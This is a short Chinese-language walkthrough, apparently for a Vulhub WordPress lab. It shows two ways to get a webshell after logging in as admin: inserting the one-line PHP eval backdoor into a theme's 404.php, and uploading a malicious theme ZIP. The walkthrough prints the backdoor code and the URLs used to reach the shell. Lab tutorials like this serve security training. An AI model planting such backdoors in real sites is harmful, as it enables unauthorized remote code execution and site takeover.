WordPress是⼀个以PHP和MySQL为平台的⾃由开源的博客软件和内容管理系统。WordPress具有插件架构和模板系统。截⾄2018年4⽉，排名前1000万的⽹站中超过30.6%使⽤WordPress。

WordPress是最受欢迎的⽹站 内容管理系统。全球有⼤约30%的⽹站(7亿5000个)都是使⽤WordPress架设⽹站的。WordPress是⽬前 因特⽹上最流⾏的博客系统。WordPress在最著名的⽹络发布阶段中脱颖⽽出。如今，它被使⽤在超过7000万个站点上。

姿势一：后台修改模板拿WebShell

1.在宝塔界面进⼊Vulhub靶场并执⾏以下命令开启靶场；在浏览器中访问并安装好....

#执⾏命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://166.108.234.191:8080/wp-admin/

2.修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell；登陆WP后点击 【外观】 --》 【编辑】 -》 404.php

3.在其404模板中插⼊⼀句话⽊⻢代码..点击 【更新⽂件】 按钮

<?php eval($_POST[cmd]);?>

5.访问以下连接即可获取WebShell..

http://166.108.234.191:8080/wp-content/themes/twentyfifteen/404.php

姿势⼆：上传主题拿WebShell

1.将带有phponfp();的⽂件加⼊到主题中并将主题压缩为ZIP⽂件...点击 【外观】 --》 【主题】 --》 【添加】 --》 【上传主题】 --》 【浏览】 --》 【现在安装】

2.安装成功后访问主题下的⽹站后⻔⽂件

http://166.108.234.191:8080/wp-content/themes/qzdy-master/6.php